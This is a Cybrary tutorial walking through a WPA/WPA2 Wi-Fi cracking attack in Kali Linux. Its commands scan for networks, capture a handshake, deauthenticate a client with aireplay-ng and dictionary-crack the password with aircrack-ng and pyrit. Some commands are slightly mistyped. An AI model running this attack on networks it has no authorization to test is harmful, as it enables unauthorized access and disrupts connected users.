Pentest WPA / WPA2 Encryption with Kali

April 24, 2017 | Views: 12445

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Pentest WPA / WPA2 Encryption with Kali

Hello and welcome to this tutorial!

Please note:  All tests were carried out on the MacBook Air with installed Kali Linux and Wi-Fi Adapter TP-LINK TL-WN722N.

Step 1:

The first step of this tutorial concerns the checking operability the network interface of wi-fi adapterOpen a Terminal and type the following command:


In our case, we see two interfaces.  Lo Interface does not interest us because we work with wlan0 in the Mode: Managed.

Step 2:

Once we have verified that the Wi-Fi adapter is working, we need to scan the available Wi-Fi networks. To scan, enter the following command:

 iwlist wlan0 scanning 

After the command, you will see a list of available wi-fi networks, among which you choose the desired network for an attack.

Important: Address / ESSID / Channel 

Step 3:

Now we need to translate your network interface in monitor mode. Type the following command:

 airmonng start wlan0

Now wlan0 interface will be named wlan0mon. 

Step 4:

On selected network Wi-Fi, we have to capture a handshake. To capture we enter the command:

Airodump-ng wlan0mon –bssid 14:3E:BF:F0:66:0E –channel 6  –write handshake –wps


wlan0mon – interface name
bssid 14:3E:BF:F0:66:0E  – MAC-address of the router
channel 6 – channel restriction
write handshake – record the captured information into a file named handshake 
wps – show the presence of WPS

Important: BSSID / STATION

Step 5:

Please note:  If the upper right corner you have the inscription WPA handshake: Mac-address, then you can skip this step. 

Handshake occurs only when the client connects to the access point. You can wait until the new client will be connected to the network, but we reconnected selected customer.

We need to work without closing the terminal. Open a new terminal and type in it the following command:

aireplay-ng -0 10 –a 14:3E:BF:F0:66:0E –c 28:37:37:EA:E6:08 wlan0mon


-0  —reconnected

10 – the number of reconnections

-a 14:3E:BF:F0:66:0E – MAC address of the access point

–c 28:37:37:EA:E6:08 – MAC address of the client

wlan0mon – use interface

If successful, we will see in the first terminal the handshake in the upper right corner

Close the second terminal and in the first terminal stop scanning operation by pressing the key combination Ctrl + C.

Step 6:

Now we need to check the captured handshake. Enter the following command in the terminal:

cowpatty -r handshake-01.cap -c


-r – It indicates the file that you want to test

handshake-01.cap – filename which contains the network activity

с – it indicates that we need to check the handshake and not break it

We see that all of the data to decrypt Handshake we have.

Step 7:

There are two methods of decoding, using CPU or GPU. If you have a powerful graphics card, faster using GPU. In addition, we need a dictionary containing passwords.

To decrypt using the CPU, enter the following command:

aircrack-ng handshake-01.cap –w rockyou.txt


handshake-01.cap – file with handshake

-w rockyou.txt – dictionary with passwords

If the password is in the dictionary, then after a while you will see a message with a password.


To decrypt using the GPU, enter the following command:

pyrit –r handshake-01.cap –i rockyou.txt attack_passthrough

If the password is in the dictionary, then after a while you will see a message with a password.

I hope this tutorial is useful to you.  

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?